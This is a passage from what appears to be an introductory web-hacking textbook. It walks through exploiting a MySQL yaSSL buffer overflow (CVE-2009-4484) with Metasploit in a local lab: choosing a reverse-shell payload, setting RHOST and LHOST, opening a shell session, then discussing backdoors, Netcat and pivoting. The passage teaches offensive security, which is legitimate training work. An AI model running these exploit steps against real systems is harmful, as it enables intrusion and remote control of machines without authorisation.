code execution on the target machine. O ne goal of network exploitation is to gain

administrative level rights on the target machine (web server in our world) and execute
code. O nce that occurs, the hacker has complete control of that machine and is free to
complete any action, which usually includes adding users, adding administrators,
installing additional hacking tools locally on that machine to penetrate further into the
network (also known as “pivoting”), and installing backdoor code that enables persistent
connections to this exploited machine. A persistent backdoor is like creating a key to a
house to gain entry, so you can stop breaking in through the basement window. I t’s
much easier to use a key and you’re actually less likely to get caught!
We are going to use Metasploit as our exploitation tool of choice. Metasploit is an
exploitation framework developed by HD Moore and is widely accepted as the premiere
open-source exploitation tool kit available today. The Metasploit Framework (MSF or msf)
provides a structured way to exploit systems and allows for the community of users to
develop, test, deploy, and share exploits with each other. O nce you understand the basics
of the MSF, you can eﬀectively use it during all of your hacking adventures regardless of
target systems. Metasploit is only a portion of one chapter in this book, but please take
the time in the future to become more familiar with this great exploitation framework.
Before we dive into the actual exploitation steps, a couple of deﬁnitions to ensure that
we all are working from the same base terminology.
■ Vulnerability: A potential weakness in the target system. It may be a missing patch,
the use of known weak function (like strcpy in the C language), a poor
implementation, or an incorrect usage of a compiled language (such as SQL), or any
other potential problem that a hacker can target.
■ Exploit: A collection of code that delivers a payload to a targeted system.
■ Payload: The end goal of an exploit that results in malicious code being executed on
the targeted system. Some popular payloads include bind shell (cmd window in
Windows or a shell in Linux), reverse shell (when the victimized computer makes a
connection back to you, which is much less likely to be detected), VNC injection to
allow remote desktop control, and adding an administrator on the targeted system.

Basics Of Metasploit
We’ll be following a lightweight process that uses seven MSF commands to complete our
exploitation phase:
1. Search: We will search for all related exploits in MSF’s database based on the CVE
identifiers reported in the Nessus results.
2. Use: We will select the exploit that best matches the CVE identifier.
3. Show Payloads: We will review the available payloads for the selected exploit.
4. Set Payload: We will select the desired payload for the selected exploit.
5. Show Options: We will review the necessary options that must be set as part of the
selected payload.
6. Set Options: We will assign value to all of the necessary options that must be
present for the payload to succeed.
7. Exploit: We will then send our well-crafted exploit to the targeted system.

To begin, we need to launch the Metasploit framework. This is easily done in a terminal
by issuing the msfconsole command. I t will take about a minute to load Metasploit
(especially the ﬁrst time you run it), so don’t be alarmed if it seems nothing is
happening. A ll the commands shown in this section are completed in a terminal window
at the msf > prompt.
I t is good practice to update Metasploit on an almost daily basis as new exploits are
developed around the clock. The msfupdate command will update the entire framework
so you can be sure that you have the latest and greatest version of Metasploit.

Search

The first task is to find available exploits in Metasploit that match the CVE identiﬁers that
we found during vulnerability scanning with Nessus. We will search for CVE 2009–4484
from our localhost-check vulnerability scan by issuing the search 2009–4484 command in
Metasploit. This vulnerability targets the version of MySQL that our web server is
running as it is vulnerable to multiple stack-based buﬀer overﬂows. This vulnerability
allows remote attackers to execute arbitrary code or cause a denial of service.
The results of this search will list all the available exploits that Metasploit can use
against the vulnerability as introduced here.
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- --------------exploit/linux/mysql/mysql_yassl_getname
CertDecoder::GetName Buffer Overflow

2010-01-25good

MySQL

yaSSL

Use the exploit rank as a guide for which exploit to select. Each exploit will have one of
seven possible rankings: excellent (best choice), great, good, normal, average, low, and
manual (worst choice). The lower ranking exploits are more likely to crash the target
system and may not be able to deliver the selected payload. We have only one exploit,
with a good ranking, which will allow us to execute remote code on the target machine.
This is a middle-of-the-road exploit, as most vulnerabilities will have excellent or great
exploits.

A le rt
When thinking about exploitation, imagine you are on a big game hunting
adventure. The search command is like reviewing all possible animals that
you could target on such an adventure. D o you want to hunt bear, elk, or
mountain lion?

Use
O nce you’ve retrieved all the possible exploits in M etasploit and decided on the best

choice for your target, you can select it by issuing the following use command.
use exploit/linux/mysql/mysql_yassl_getname

You will receive the following prompt signaling that the use command has executed
successfully.
msf exploit(mysql_yassl_getname) >

A le rt
T h e use command is the equivalent of deciding we are going to hunt
mountain lion on our hunting adventure!

Show Payloads
T he show payloads command displays all the possible payloads that you can pick from
to be the payoﬀ when the exploit successfully lands. N ote that some of the payload
descriptions wrap to a new line of text.
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ----- ----------generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager
(IPv6)
linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP
Stager (IPv6)
linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP
Inline
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager
(IPv6)
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP
Stager (IPv6)
linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline
(IPv6)
linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP - Metasm

demo

A quick review of the rankings of these payloads doesn’t give us any direction on
which one to select as they are all normal. That’s perfectly ﬁne; we could a empt this
exploit several times with different payloads if we needed to.

A le rt
The show payloads command is like reviewing all possible gun types!

Set Payload
N ow that you know what payloads are available when you exploit the vulnerability, it’s
time to make the payload choice. I n the following command, we select a reverse shell as
the payload so we will have command line access to the target machine. The connection
will be initiated from the exploited machine so it’s less likely to be caught by intrusion
detection systems. You set the payload with the set payload command.
set payload generic/shell_reverse_tcp

You will receive the following conﬁrmation message and prompt signaling that the set
payload command has executed successfully.
payload => generic/shell_reverse_tcp
msf exploit(mysql_yassl_getname) >

A le rt
T h e set payload command is like selecting a sniper riﬂe to hunt our
mountain lion. (I f you haven’t guessed by now, I ’m not much of a hunter. But
stick with me because the analogy is pure gold!)

Show Options
Each exploit and payload will have speciﬁc options that need to be set in order to be
successful. I n most cases, we need to set the I P addresses of the targeted machine and
our a acker machine. The targeted machine is known as the remote host (RHOST), while
the a acker machine is known as the local host (LHOST). The show options command
provides the following details for both the exploit and payload.
Module options (exploit/linux/mysql/mysql_yassl_getname):
Name Current Setting Required Description
-------------------------------------RHOST yes The target address
RPORT 3306 yes The target port
Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
-------------------------------------LHOST yes The listen address
LPORT 4444 yes The listen port

There are two options in this module that are required: RHOST and RPORT. These two
entries dictate what address and port the exploit should be sent to. We will set the
RHOST option in the upcoming section and leave the RPORT as is, so it uses port 3306.
There are also two options in the payload that are required: LHOST and LPORT. We
just need to set the LHOST on the payload, as it is required in order for this payload to
succeed, and leave the LPORT as 4444.

A le rt
The show options command is like considering what supplies we are going to
take on our hunting adventure. We need to select a bullet type, a scope type,
and how big of a backpack to bring along on the trip.

Set Option

We need to assign values to all of the required exploit and payload options that are blank
by default. I f you leave any of them blank, your exploit will fail because it doesn’t have
the necessary information to successfully complete. We will be se ing both the RHOST
and the LHOST to 127.0.0.1 because we have a self-contained environment. I n a real
a ack, these two I P addresses would obviously be diﬀerent. Remember RHOST is the
target machine and LHOST is your hacking machine. You can issue the set RH O ST
127.0.0.1 and set LH O ST 127.0.0.1commands as introduced below to set these two
options.
set RHOST 127.0.0.1
RHOST => 127.0.0.1
set LHOST 127.0.0.1
LHOST => 127.0.0.1

You can issue another show options command to make sure everything is set correctly
before moving on.
Module options (exploit/linux/mysql/mysql_yassl_getname):
Name Current Setting Required Description
---- --------------- -------- ----------RHOST 127.0.0.1 yes The target address
RPORT 3306 yes The target port
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
--- --------------- -------- -----------LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port

It is confirmed that we have set all the required options for the exploit and the payload.
We are almost there!

A le rt
T he set option command is like deciding we want Winchester bullets, the 8″
night vision scope, and the 3-day backpack for our hunting adventure.

Exploit
You have done your homework and have come to the point where, with one click, you
will have complete control of the targeted machine. S imply issue the exploit command
and the exploit we built is sent to the target. I f your exploit is successful, you will receive
the following conﬁrmation in the terminal where it displays there is one open session on
the target machine.
Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:3306)

A le rt
The exploit command is like pulling the trigger.

You can interact with this session by issuing the sessions -i 1 command. You now
control the target machine completely; it’s like you are si ing at the keyboard. You can
see all open sessions by issuing the sessions command.

A le rt
I f you run into an “I nvalid session id” or “no active sessions” error, the
problem is related to the conﬁguration of the MyS Q L running on your
BackTrack VM. This speciﬁc exploit is only applicable to certain versions of
MyS Q L running with a speciﬁc S S L conﬁguration. For more details of the
exact conﬁguration and how you can tweak your VM to ensure successful
exploitation, please see https://dev.mysql.com/doc/refman/5.1/en/configuringfor-ssl.html. Even if you tweak your MyS Q L installation, the exploitation
steps introduced in this section remain completely unchanged. I n fact, these
same steps can be used for most network-based a acks that you’d like to
attempt!

A nother option is to download another VM that is dedicated to network hacking and
provides vulnerable services to conduct the steps in this chapter. Metasploitable is such a

VM and is provided by the Metasploit team and can be downloaded at
http://www.offensive-security.com/metasploit-unleashed/Metasploitable. You would then
have two separate VMs to use to work through this chapter (one a acker and one victim
VM).

Maintaining Access
Maintaining access is when a hacker is able to plant a backdoor so he/she maintains a
complete control of the exploited machine and can come back to the machine at a later
time without having to exploit it again. I t is the icing on the exploitation cake! A lthough
it’s not part of our Basics of Web Hacking approach, it does deserve discussion. Topics
such as rootkits, backdoors, Trojans, viruses, and botnets all fall into the maintaining
access category.
Perhaps the most common tool used during persistent access is Netcat. This tool has
been dubbed the Swiss Army Knife of hacking because of its ﬂexibility in se ing up,
conﬁguring, and processing network communication between several machines. Netcat is
often one of the ﬁrst tools to get installed after exploiting a system because the hacker
can then dig even deeper into the network and a empt to exploit additional computers
by pivoting. Pivoting means using an already exploited machine as an a ack platform
against additional computers on the internal network that would otherwise be totally
inaccessible to outside traﬃc. There are exact Netcat examples in later chapters, as we
exploit the web application. A s more computers are exploited, the hacker continues to
pivot deeper into the internal network and, if left undetected, may eventually
compromise all network computers. This is the stuff dreams are made of for hackers!

C H AP T E R 3

Web Application Recon and Scanning

